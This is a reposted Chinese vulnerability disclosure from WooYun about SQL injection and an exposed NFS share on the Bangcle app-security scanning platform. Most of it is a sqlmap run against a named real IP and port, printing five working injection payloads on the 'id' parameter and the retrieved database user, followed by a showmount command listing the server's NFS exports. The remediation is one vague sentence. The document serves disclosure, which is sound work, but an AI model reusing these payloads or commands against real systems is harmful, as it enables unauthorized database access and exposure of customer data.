记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

梆梆安检平台SQL漏洞造成潜在用户曝光另加一处nfs

2015-06-28 20:15

漏洞证明:

1.

注入





C:\Python27\sqlmap>sqlmap.py -u "http://42.62.59.221:8081/result?id=54c9fe0d996c

5824e43dd4edbc34aa76" --dbms mysql --current-user

_

___ ___| |_____ ___ ___ {1.0-dev-nongit-20140909}

|_ -| . | | | .'| . |

|___|_ |_|_|_|_|__,| _|

|_| |_| http://sqlmap.org



[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program



[*] starting at 22:26:01



[22:26:01] [INFO] testing connection to the target URL

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=54c9fe0d996c5824e43dd4edbc34aa76' AND 4724=4724 AND 'PbCO'='PbCO





Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: id=54c9fe0d996c5824e43dd4edbc34aa76' AND (SELECT 9117 FROM(SELECT C

OUNT(*),CONCAT(0x7162676371,(SELECT (CASE WHEN (9117=9117) THEN 1 ELSE 0 END)),0

x7175726c71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x

)a) AND 'uIev'='uIev



Type: UNION query

Title: MySQL UNION query (NULL) - 4 columns

Payload: id=-1535' UNION ALL SELECT NULL,NULL,CONCAT(0x7162676371,0x4b42445a

4258424d4447,0x7175726c71),NULL#



Type: stacked queries

Title: MySQL > 5.0.11 stacked queries

Payload: id=54c9fe0d996c5824e43dd4edbc34aa76'; SELECT SLEEP(5)--



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=54c9fe0d996c5824e43dd4edbc34aa76' AND SLEEP(5) AND 'WtXF'='WtXF

---

[22:26:01] [INFO] testing MySQL

[22:26:01] [INFO] confirming MySQL

[22:26:01] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.0

[22:26:01] [INFO] fetching current user

current user: 'scanosclient@%'

3.jpg



造成了4W个app用户名字泄露。直接把潜在客户让竞争对手知道。争夺资源。

1.jpg



同样也有国际版外国的app。

2.jpg



同服务器也有一台nfs漏洞。

showmount -e 42.62.59.221



/home/sec/project 192.168.1.*

/home/sec/sharefolder 61.135.164.222

修复方案:

没有打理的地方要重新打理。

知识来源: www.wooyun.org/bugs/wooyun-2015-0113990

阅读:70519 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“梆梆安检平台SQL漏洞造成潜在用户曝光另加一处nfs”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词